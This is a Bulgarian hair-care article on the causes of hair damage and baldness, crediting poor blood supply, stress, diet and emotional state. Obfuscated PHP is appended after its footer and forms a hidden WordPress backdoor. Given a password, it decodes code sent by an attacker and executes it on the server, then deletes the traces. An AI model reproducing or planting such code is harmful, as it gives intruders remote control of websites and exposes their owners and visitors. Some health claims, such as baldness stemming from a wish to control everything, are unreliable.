Причини за увреждането на косата | Косопад

Причини за увреждането на косата

opleshivyavane-prichini

Когато косата започне да става чуплива, когато изсъхне и започне да се влошава и капе, това означава, че не сме се грижили правилно за нея.

Когато косата започне да появява признаци на отслабване, това означава, че оросяването не е достатъчно. Липсата на захранване от кръвта е една от основните причини, които не позволяват на косата да е здрава.

Преумората, притесненията, липсата на движение, ученето без достатъчна почивка за мозъка и липсата на сън, причиняват умора в организма, който няма достатъчно сила да ороси скалпа – това си проличава от състоянието на косата.

kosopad-sredstva

Кръвта храни цялата коса. Затова, ако не приемаме достатъчно минерали и други полезни вещества, те ще се изразходят още преди да достигнат косата. Ето защо е важно да следите храненето си и да сте сигурни, че то ви осигурява необходимите минерали и витамини.

Оплешивяването, както и посивялата и бяла коса, отразяват също така душевното ни състояние и храненето ни. Оплешивяването много често е резултат от дълги периоди на напрежение или на обсебващо желание да контролирате всичко. Заради отговорностите и бързината на живеене, не забелязваме, че кожата на главата ни всъщност е напрегната. Продължителното напрягане на скалпа свива корените, като води до косопад.

02. юни 2014 20:08:09 от Надя Колева
Категории: Косопад – Статии | Етикети: , , , | Напишете Коментар

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}